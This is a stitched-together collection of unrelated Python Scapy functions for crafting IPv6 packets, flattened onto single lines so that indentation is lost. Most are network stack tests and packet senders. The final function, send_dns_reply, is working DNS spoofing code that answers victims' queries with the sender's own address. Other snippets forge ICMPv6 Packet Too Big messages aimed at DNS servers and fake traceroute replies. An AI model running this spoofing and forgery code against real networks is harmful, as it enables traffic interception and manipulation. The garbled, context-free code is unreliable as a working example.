def test_empty_fragment_header_wo_register(child, iface, hw_dst, ll_dst, ll_src): # Try sending an empty fragment header sendp(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) / IPv6ExtHdrFragment() / UDP(), iface=iface, verbose=0) pktbuf_empty(child)
def test_end_ipv4_segment_left_zero(self): packet_in = \ Ether(src="aa:aa:aa:aa:aa:aa", dst="bb:bb:bb:bb:bb:bb") / \ IPv6(src="fc00::1", dst="fc00::3") / \ IPv6ExtHdrSegmentRouting(len=(16 * 2) / 8, segleft=0, lastentry=0, addresses=["fc00::3"]) / \ IP(src="192.168.1.1", dst="192.168.1.3") / \ TCP() self._run_test(packet_in, None, BPF.XDP_DROP)
def main(): iface = "eth1" print "sending on interface %s" % (iface) pkt = Ether(src='00:15:4d:00:00:00', dst='00:15:4d:00:00:03') pkt = pkt / IPv6(dst="fc00::4" , src="fc00::1") #/ UDP() #/ sys.argv[1] pkt.show2() sendp(pkt, iface=iface, verbose=False)
def test_empty_hop_by_hop_opt_wo_register(child, iface, hw_dst, ll_dst, ll_src): # Try sending an empty hop-by-hop-option header sendp(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) / IPv6ExtHdrHopByHop() / UDP(), iface=iface, verbose=0) pktbuf_empty(child)
def handle_pkt(pkt): #if UDP in pkt and pkt[UDP].dport == 2152: #if UDP in pkt: print "got a packet" pkt.show2() #hexdump(pkt) print "===================================ENVIANDO PACOTE ALTERADO=============================" #new implementation time.sleep(5) if pkt.segleft >= 0: new = Ether(src=pkt[Ether].dst, dst=pkt[Ether].src); extension = IPv6ExtHdrRouting(); extension.segleft = pkt.segleft-1; extension.addresses = pkt.addresses; if extension.segleft == 2: new = new / IPv6(dst = extension.addresses[2], src="2001:0DB8:AC10:FE01:0000:0000:0000:0002") / extension / UDP (sport=64515, dport=2152 ) / GTP_U_Header(TEID=32)/ IPv6(dst="2001:0DB8:AC10:FE01:0000:0000:0000:0001" , src="2001:0DB8:AC10:FE01:0000:0000:0000:0006") / "host2"; if extension.segleft == 1: new = new / IPv6(dst = extension.addresses[1], src="2001:0DB8:AC10:FE01:0000:0000:0000:0002") / extension / UDP (sport=64515, dport=2152 ) / GTP_U_Header(TEID=32)/ IPv6(dst="2001:0DB8:AC10:FE01:0000:0000:0000:0001" , src="2001:0DB8:AC10:FE01:0000:0000:0000:0006") / "host2"; if extension.segleft == 0: new = new / IPv6(dst = extension.addresses[0], src="2001:0DB8:AC10:FE01:0000:0000:0000:0002") / extension / UDP (sport=64515, dport=2152 ) / GTP_U_Header(TEID=32)/ IPv6(dst="2001:0DB8:AC10:FE01:0000:0000:0000:0001" , src="2001:0DB8:AC10:FE01:0000:0000:0000:0006") / "host2"; new.show2() sendp(new, loop=0, count=1) #end of new implementation #old implementation #time.sleep(5) #pkt2 = pkt #temp = pkt[Ether].src #pkt2[Ether].src = pkt2[Ether].dst #pkt2[Ether].dst = temp #pkt2.segleft = pkt2.segleft - 1 #if pkt2.segleft == 1: # pkt2[IPv6].dst = pkt2.addresses[1]; #if pkt2.segleft == 0: # pkt2[IPv6].dst = pkt2.addresses[0]; #pkt2[Raw] = (b"host2") #pkt2.show2() ja estava comentado #sendp(pkt2, loop=0, count=1) #sr1(sendp(pkt2, loop=1, verbose = False)) ja estava comentado #end of old implementation main()
def run(self): """Sends ICMPv6 echo request packets marked with the data upribox to the IPv6 all nodes multicast address. Received echo replies are processed by a SniffThread. """ while True: send(IPv6(dst=self._MULTICAST_DEST) / ICMPv6EchoRequest(data=self._DATA), iface=self.interface) time.sleep(self._SLEEP)
def gen_packet(eth_only=False, size=None): """Generate a random network packet. By default, function generates a random IPv4 or IPv6 packet, possibly with TCP or UDP payloads. If the 'eth_only' parameter is set to True, the returned packet is an Ethernet frame that does not include any packet headers above layer 2. """ # generate ethernet frame with fixed MAC addresses pkt = Ether(src="53:00:00:00:00:01", dst="53:00:00:00:00:02") if not eth_only: # encapsulate IP packet if randint(0, 1) == 0: pkt /= IP(src=RandIP()._fix(), dst=RandIP()._fix()) else: pkt /= IPv6(src=RandIP6()._fix(), dst=RandIP6()._fix()) if IP in pkt: # generated packet L3 is IPv4 rand = random() if rand < 0.1: # mark some packets as fragments if randint(0, 1) == 0: pkt[IP].flags = 1 # set MF flag else: pkt[IP].frag = randint(1, 2**13 - 1) # frag offset elif rand < 0.8: # encapsulate TCP / UDP payload in some more if randint(0, 1) == 0: pkt /= TCP(sport=randint(0, 2**16 - 1), dport=randint(0, 2**16 - 1)) else: pkt /= UDP(sport=randint(0, 2**16 - 1), dport=randint(0, 2**16 - 1)) else: # do not encapsulate anything in all others pass elif IPv6 in pkt: # generated packet L3 is IPv6 rand = random() if rand < 0.8: # encapsulate TCP / UDP payload in some more if randint(0, 1) == 0: pkt /= TCP(sport=randint(0, 2**16 - 1), dport=randint(0, 2**16 - 1)) else: pkt /= UDP(sport=randint(0, 2**16 - 1), dport=randint(0, 2**16 - 1)) else: # encapsulate nothing pass # append some random payload if size is not None: pkt /= ''.join(chr(randint(0, 255)) for _ in range(size - len(pkt))) else: pkt /= ''.join(chr(randint(0, 255)) for _ in range(randint(50, 1000))) return pkt
def test_task10(riot_ctrl, log_nodes): # pylint: disable=R0914 node = riot_ctrl(0, APP, Shell, port=TAP) host_netif = bridge(TAP) host_lladdr = get_link_local(host_netif) node_netifs = NETIF_PARSER.parse(node.ifconfig_list()) node_netif = next(iter(node_netifs)) node_hwaddr = node_netifs[node_netif]["hwaddr"] node_lladdr = [ addr["addr"] for addr in node_netifs[node_netif]["ipv6_addrs"] if addr["scope"] == "link" ][0] ip = IPv6(src=host_lladdr, dst=node_lladdr) stop_id = 0xc07c test_id = 0xb488 sniffer = AsyncSniffer( stop_filter=lambda p: ICMPv6EchoReply in p and p[ICMPv6EchoReply].id == stop_id, iface=host_netif, ) sniffer.start() time.sleep(.1) max_pkts = _max_encapsulations() for i in range(max_pkts): start = time.time() ips = ip for _ in range(i): ips /= ip sendp(Ether(dst=node_hwaddr) / ips / ICMPv6EchoRequest(id=test_id, seq=i), iface=host_netif, verbose=log_nodes) stop = time.time() if (stop - start) <= 0.001: time.sleep(0.001 - (stop - start)) # send stop condition for sniffer sendp(Ether(dst=node_hwaddr) / ip / ICMPv6EchoRequest(id=stop_id), iface=host_netif, verbose=log_nodes) sniffer.join() pkts = sniffer.results requests = [ p for p in pkts if ICMPv6EchoRequest in p and p[ICMPv6EchoRequest].id == test_id ] replies = [ p for p in pkts if ICMPv6EchoReply in p and p[ICMPv6EchoReply].id == test_id ] assert len(requests) <= max_pkts assert len(replies) <= max_pkts assert (len(replies) / max_pkts) > .96 reply_seqs = [r[ICMPv6EchoReply].seq for r in replies] reply_seq_occs = [reply_seqs.count(seq) for seq in reply_seqs] # no sequence number occurs more than once in the replies assert not any(occ > 1 for occ in reply_seq_occs)
def main(): if len(sys.argv) < 2: print 'pass 2 arguments: <destination> "<message>"' exit(1) iface = "eth1" print "sending on interface %s" % (iface) pkt = Ether(src='00:15:4d:00:00:00', dst='00:15:4d:00:00:03') / IPv6( src="fc00::1", dst="fc00::4") / UDP( sport=64515, dport=2152) / GTP_U_Header( TEID=32, Reserved=0) / IPv6( src="fc00::3", dst="fc00::4") / TCP(dport=81) / sys.argv[1] pkt.show2() hexdump(pkt) sendp(pkt, iface=iface, verbose=False)
def check_dad(ipv6address, interface, hw_addr="9c:b6:d0:fe:41:43", dst_a="ff02::1"): if check_iface(interface): exit(1) HW_MAC = get_if_hwaddr(interface) neigh_sol = IPv6(dst=dst_a)/\ ICMPv6ND_NS(tgt=ipv6address)/\ ICMPv6NDOptSrcLLAddr(lladdr=HW_MAC) ans,u = sr(neigh_sol, timeout=1, iface=interface, multi=True, verbose=False) return True if ans else False
def add_query(msg, src_port, target, dst_mac): if ':' in target: PKTS.append( Ether(dst=dst_mac, src=src_mac) / IPv6(dst=target, src=host_ip) / UDP(sport=src_port, dport=target_port) / msg) else: PKTS.append( Ether(dst=dst_mac, src=src_mac) / IP(dst=target, src=host_ip) / UDP(sport=src_port, dport=target_port) / msg)
def craft(hdr, fl): snd = [] rcv = {} for fl in range(fl, fl+nbrFlux): Utils.set_fl(hdr, fl) sip = 'fc00:2:0:1::1' # Adresses don't rlly matter dip = 'fc00:2:0:2::1' packets_snd = fragment6(IPv6(src=sip, dst=dip) / IPv6ExtHdrFragment() / ICMPv6EchoRequest(data='A'*300), 100) packets_snd = [pkt.__class__(str(hdr/pkt)) for pkt in packets_snd] packet_excepted = pkt.__class__(str(hdr/IPv6(src=sip, dst=dip) / ICMPv6EchoRequest(data='A'*300))) snd.extend(packets_snd) rcv[fl] = [packet_excepted] return (snd, rcv)
def test_ipv6_ext_frag_fwd_too_big(child, s, iface, ll_dst): mtu, dst_mac = _fwd_setup(child, ll_dst, "beef::1", "affe::1") assert (get_host_mtu(iface) > mtu) payload_fit = get_host_mtu(iface) - len( IPv6() / IPv6ExtHdrFragment() / UDP()) pkt = srp1(Ether(dst=dst_mac) / IPv6(src="beef::1", dst="affe::1") / IPv6ExtHdrFragment(m=True, id=0x477384a9) / UDP(sport=1337, dport=1337) / ("x" * payload_fit), timeout=2, verbose=0, iface=iface) # packet should not be fragmented further but an ICMPv6 error should be # returned instead assert (pkt is not None) assert (ICMPv6PacketTooBig in pkt) assert (IPv6ExtHdrFragment in pkt) assert (pkt[IPv6ExtHdrFragment].id == 0x477384a9) _fwd_teardown(child)
def run(self): """Sends Multicast Listener Discovery Queries to all nodes on the network. Received Multicast Listener Reports are processed by a SniffThread. """ while True: send(IPv6(dst=self._MULTICAST_DEST, hlim=self._HOP_LIMIT) / IPv6ExtHdrHopByHop(options=RouterAlert()) / ICMPv6MLQuery(), iface=self.interface) time.sleep(self._SLEEP)
def break_checksum(self, packet): b = IPv6(packet.build()) if b.haslayer(ICMPv6EchoReply): b.getlayer(ICMPv6EchoReply).cksum = None elif b.haslayer(ICMPv6EchoRequest): b.getlayer(ICMPv6EchoRequest).cksum = None return b
def updownlink(pkt): if IPv6 in pkt: #if GTP_U_Header in pkt: if UDP in pkt and pkt[UDP].dport == 2152: #print "5G_CORE -> DN/UE" #print "ORIGINAL PACKET" #pkt.show() #PAYLOAD PACKET data = pkt[Raw].load temp = dl_pdu_session(data) if temp[dl_pdu_session].Spare == 2: print "5G_CORE TO DASH" #print "PAYLOAD PACKET" data2 = temp[Padding].load pkt2 = IPv6(data2) pkt3 = Ether(dst="08:00:27:dd:dd:dd", src="08:00:27:aa:aa:aa") / pkt2 pkt3.show() sendp(pkt3, iface="eth2", verbose=False) #sys.stdout.flush() #main() else: print "DASH TO 5G_CORE" #print "ORIGINAL PACKET" pkt.show() #5G PACKET CONSTRUCTION pkt5g = Ether( src='00:15:5d:00:00:04', dst='00:15:5d:00:00:00') / IPv6( src="fc00::5", dst="fc00::1") / IPv6ExtHdrRouting( type=4, segleft=2, addresses=["fc00::1", "fc00::101", "fc00::100"]) / UDP( sport=64515, dport=2152) / GTP_U_Header( TEID=32, Reserved=0, E=1) / dl_pdu_session( gtp_ext=133, QoSID=14, Spare=1) #Full packet (5G + USER DATA) pkt2 = pkt5g / pkt[IPv6] #print "5G FULL PACKET" #pkt2.show() sendp(pkt2, iface="eth1", verbose=False)
def main(): parser = argparse.ArgumentParser(description="Scapy sender program template") parser.add_argument('-v', type=int, help="Specify using (4)IPv4/(6)IPv6.", default=4) parser.add_argument('--intf', type=str, help="Specify interface.", default="eth0") parser.add_argument('--dip', type=str, help="The destination IP address.", default="255.255.255.255") parser.add_argument('--l4', type=str, help="Specify using TCP or UDP.", default="tcp") # parser.add_argument('--loop', type=int, help="Number of loop.", default=0) # parser.add_argument('--msg', type=str, help="The message which will send to dst.",default="Hello World") parser.add_argument('--dport', type=int, help="TCP/UDP destination port.", default=1234) parser.add_argument('--sport', type=int, help="TCP/UDP source port.", default=random.randint(49152,65535)) # parse args = parser.parse_args() # parser.print_help() # get value from args ipv = args.v addr = socket.gethostbyname(args.dip) iface = args.intf #get_if() dip = args.dip l4flag = args.l4 dport = args.dport sport = args.sport # print all print("IP version: IPv", ipv) print("Destination IP address: ", dip) print("Interface: ", iface) print("Layer 4: ", l4flag) print("Desintation Port number: ", dport) print("Source Port number: ", sport) # start to pack if ipv is 4: print "sending on interface {} to IP addr {}".format(iface, str(addr)) # for x in range(0, args.loop): pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') if l4flag is 'tcp': pkt = pkt / IP(dst=addr) / TCP(dport=dport, sport=sport) / "Scapy Template" else: pkt = pkt / IP(dst=addr) / UDP(dport=dport, sport=sport) / "Scapy Template" # show pkt.show2() # send sendp(pkt, iface=iface, verbose=True) # sleep time.sleep(1) elif ipv is 6: print "sending on interface {} to IPv6 addr {}".format(iface, str(addr)) #for x in range(0, args.loop): pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IPv6(dst=addr) / TCP(dport=dport, sport=sport) / "Scapy Template" # show pkt.show2() # send sendp(pkt, iface=iface, verbose=False)
def _max_encapsulations(): """ Calculates the maximum number of IPv6 headers that can be encapsulated within each other without exceeding the MTU of Ethernet. """ i = 1 ip_hdr_len = len(IPv6()) while ((i * ip_hdr_len) + 8) < 1500: i += 1 return i - 1
def test_empty_dst_opt_large_hdr_len(child, iface, hw_dst, ll_dst, ll_src): # Register to hop-by-hop-option header register_protnum(child, EXT_HDR_NH[IPv6ExtHdrDestOpt]) # Try sending an empty hop-by-hop-option header with too big header length sendp(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) / IPv6ExtHdrDestOpt(len=20) / UDP() / "\x01\x02", iface=iface, verbose=0) pktbuf_empty(child) unregister(child)
def test_04_port_range_no_match_v6(self): for dst_port in [98, 99, 201, 202]: # just next to the range test_packet = Ether() / IPv6(src="fd91:79d3:d621::1234", dst="fdb4:98ce:52d4::42") / TCP( sport=45678, dport=dst_port) self.sendp(test_packet, iface=self.IFACE_NAME_PY) packet = self.wait_for_packet( self.kni_tx, lambda packet: isinstance(packet.payload, IPv6) and packet.payload.dst == "fdb4:98ce:52d4::42") assert_equals(packet.payload.dst, "fdb4:98ce:52d4::42")
def send_ptb(server, mtu=1280): ipv6 = IPv6(dst=server) # First send a small question so we can create a believable PTB # create DNS Questions '. IN NS' packet = ipv6 / UDP() / DNS(qd=DNSQR(qname='.', qtype='SOA')) logging.debug('{}: generate some DNS traffic'.format(server, mtu)) ans = sr1(packet, verbose=False) # Send ICMPv6 PTB message with geniune data logging.debug('{}: sending ICMPv6 PTB with MTU = {}'.format(server, mtu)) send(ipv6 / ICMPv6PacketTooBig(mtu=mtu) / ans.original[:512], verbose=False)
def do_callback(payload): data = payload.get_data() pkt = IPv6(data) if pkt.version == 6: if pkt.nh == 58: reply = IPv6() reply.dst = pkt[IPv6].src hl = pkt[IPv6].hlim if hl == path_length: reply.src = destination else: reply.src = "%s%s" % (prefix, hl) icmp = ICMPv6TimeExceeded() icmp.code = 0 try: send(reply / icmp / pkt, verbose=0) except UnboundLocalError: print "meh" pass
def __init__(self): self.Ether = Ether() self.IP = IP() self.IPv6 = IPv6() self.ARP = ARP() self.TCP = TCP() self.UDP = UDP() self.ICMP = ICMP() self.BOOTP = BOOTP() self.DHCP = DHCP()
def sendip6ping(self): """ send a IPv6 Icmp Ping """ if self.mac is not None: if self.linklocal is None: self.linklocal = mac2ipv6(self.mac) if self._verbose > 1: print("sendip6ping:", self.linklocal, self.name) send(IPv6(dst=self.linklocal) / ICMPv6EchoRequest() / "whosthere")
def dnsv6_request(nameserver, domain_name, iface): transaction_id = 0x3d3d payload = Ether(dst="cc:d5:39:dc:01:c1") payload /= IPv6(dst=nameserver) payload /= UDP(sport=47516, dport=53) payload /= DNS(id=transaction_id, rd=1, qd=DNSQR(qname=domain_name, qtype='AAAA')) return srp1(payload, verbose=True, iface=iface)
def test_time_exc(child, iface, hw_dst, ll_dst, ll_src): dummy = "affe::1" p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, hlim=1, src=ll_src) / IPv6ExtHdrRouting(type=3, segleft=1, addresses=[dummy]), iface=iface, timeout=1, verbose=0) assert (p is not None) assert (ICMPv6TimeExceeded in p) assert (p[ICMPv6TimeExceeded].code == 0) pktbuf_empty(child)
def generic(self, extensions): packets = [Ether() / IPv6() / extensions / UDP(dport=55555)] * 5 self.arrived(packets, self.send_packets(packets)) subprocess.run([XDP_FILTER, "port", "55555", "--mode", "dst"]) self.not_arrived(packets, self.send_packets(packets)) subprocess.run( [XDP_FILTER, "port", "55555", "--mode", "dst", "--remove"]) self.arrived(packets, self.send_packets(packets))
def test_ipv6_ext_frag_send_last_fragment_only_one_byte( child, s, iface, ll_dst): mtu = get_host_mtu(iface) # subtract IPv6 and UDP header as they are not part of the UDP payload length = (mtu - len(IPv6() / UDP())) length += 1 port = s.getsockname()[1] udp_send(child, ll_dst, port, length) data, _ = s.recvfrom(length) assert len(data) == length pktbuf_empty(child)
def test_02_icmp_fragmentation_required(self): test_packet = Ether() / IPv6( src='fd91:79d3:d621::6666', dst='fdb4:98ce:52d4::42') / ICMPv6PacketTooBig() / IPv6( src="fdb4:98ce:52d4::42", dst="fd91:79d3:d621::1234") / TCP( sport=80, dport=45678) self.sendp(test_packet, iface=self.IFACE_NAME_PY) packet = self.wait_for_packet( self.eth_tx, lambda packet: isinstance( packet.payload, IP) and isinstance(packet.payload.payload, UDP) and packet.payload.payload.dport == self.DIRECTOR_GUE_PORT) assert isinstance(packet, Ether) assert_equals(packet.dst, self.py_side_mac) fou_ip = packet.payload assert isinstance(fou_ip, IP) # Expecting an IP packet assert_equals(fou_ip.src, '65.65.65.65') assert_equals(fou_ip.dst, '5.6.7.8') fou_udp = fou_ip.payload assert isinstance(fou_udp, UDP) # Expecting a FOU packet assert_equals(fou_udp.sport, self.sport_for_packet(test_packet)) assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT) glb_gue = fou_udp.payload assert isinstance( glb_gue, GLBGUE) # Expecting a GUE packet (scapy will always map this) assert_equals(glb_gue.private_data[0].hop_count, 1) assert_equals(glb_gue.private_data[0].next_hop, 0) assert_equals(glb_gue.private_data[0].hops, ['6.7.8.9']) inner_ip = glb_gue.payload assert isinstance(inner_ip, IPv6) # Expecting the inner IP packet assert_equals(inner_ip.src, 'fd91:79d3:d621::6666') assert_equals(inner_ip.dst, 'fdb4:98ce:52d4::42') inner_tcp = inner_ip.payload assert isinstance( inner_tcp, ICMPv6PacketTooBig) # Expecting the inner ICMP packet
def send_dns_reply(p): if IPv6 in p: ip = p[IPv6] resp = Ether(dst=p.src, src=p.dst) / IPv6( dst=ip.src, src=ip.dst) / UDP(dport=ip.sport, sport=ip.dport) else: ip = p[IP] resp = Ether(dst=p.src, src=p.dst) / IP(dst=ip.src, src=ip.dst) / UDP( dport=ip.sport, sport=ip.dport) dns = p[DNS] #only reply to IN, and to messages that dont contain answers if dns.qd.qclass != 1 or dns.qr != 0: return #Make sure the requested name is in unicode here reqname = dns.qd.qname.decode() #A request if dns.qd.qtype == 1: rdata = config.selfipv4 #AAAA request elif dns.qd.qtype == 28: rdata = config.selfaddr #PTR request elif dns.qd.qtype == 12: # To reply for PTR requests for our own hostname # comment the return statement return if reqname == config.selfptr: #We reply with attacker.domain rdata = 'attacker.%s' % config.localdomain else: return #Not handled else: return if should_spoof_dns(reqname): resp /= DNS(id=dns.id, qr=1, qd=dns.qd, an=DNSRR(rrname=dns.qd.qname, ttl=100, rdata=rdata, type=dns.qd.qtype)) try: sendp(resp, iface=config.default_if, verbose=False) except socket.error as e: print('Error sending spoofed DNS') print(e) if config.debug: ls(resp) print('Sent spoofed reply for %s to %s' % (reqname, ip.src)) else: if config.verbose or config.debug: print('Ignored query for %s from %s' % (reqname, ip.src))